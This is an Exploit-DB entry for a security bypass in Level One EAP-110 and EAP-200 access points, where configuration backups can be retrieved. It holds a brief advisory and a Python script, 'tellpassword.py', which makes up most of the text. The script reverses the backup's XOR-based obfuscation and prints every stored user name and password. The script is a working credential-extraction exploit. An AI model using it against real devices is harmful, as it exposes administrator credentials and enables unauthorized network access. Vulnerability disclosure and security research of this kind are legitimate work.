Level One Enterprise Access Point (Multiple Devices) - 'backupCfg.cgi' Security Bypass

EDB-ID:

38804

CVE:

N/A




Platform:

Hardware

Date:

2013-10-15


source: https://www.securityfocus.com/bid/63168/info

Multiple Level One Enterprise Access Point devices are prone to a security bypass vulnerability.

Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks.

Level One EAP-110 and EAP-200 running firmware 2.00.03 build 1.50-1.5045 are vulnerable; other versions may also be affected. 

# tellpassword.py
#
# Extracts user accounts from Level1 (ip4net)
# EAP-200 (and other) Wifi Access Points
#
# (c) 2013 sigma star gmbh

import sys, re

attribRegex = re.compile(r"(\w+)=\"([^\"]*)\"")

if (len(sys.argv) != 2):
    print "USAGE: %s config-backup.conf" % sys.argv[0]
    exit(1)

# decrypt config
encrypted = open(sys.argv[1], 'rb')
plain = open('plain.xml', 'w')
cntr = 0
encrypted.seek(128)
byte = encrypted.read(1)
print "Decrypting config file into plain.xml"
while byte:
    plainOrd = ((ord(byte) ^ 0xff) + cntr) % 0x80
    plain.write(chr(plainOrd))
    cntr = (cntr + 1) % 0x40
    byte = encrypted.read(1)
encrypted.close()
plain.close()

# find user accounts
print "Parsing accounts..."
plain = open('plain.xml', 'r')
for line in plain:
    if "<user" in line:
        user = None
        password = None
        for match in attribRegex.finditer(line):
            attrib = match.group(1)
            if attrib == "name":
                user = match.group(2)
            elif attrib == "password":
                password = match.group(2)
        if len(password) > 0:
                print " - %s: %s" % (user, password)
plain.close()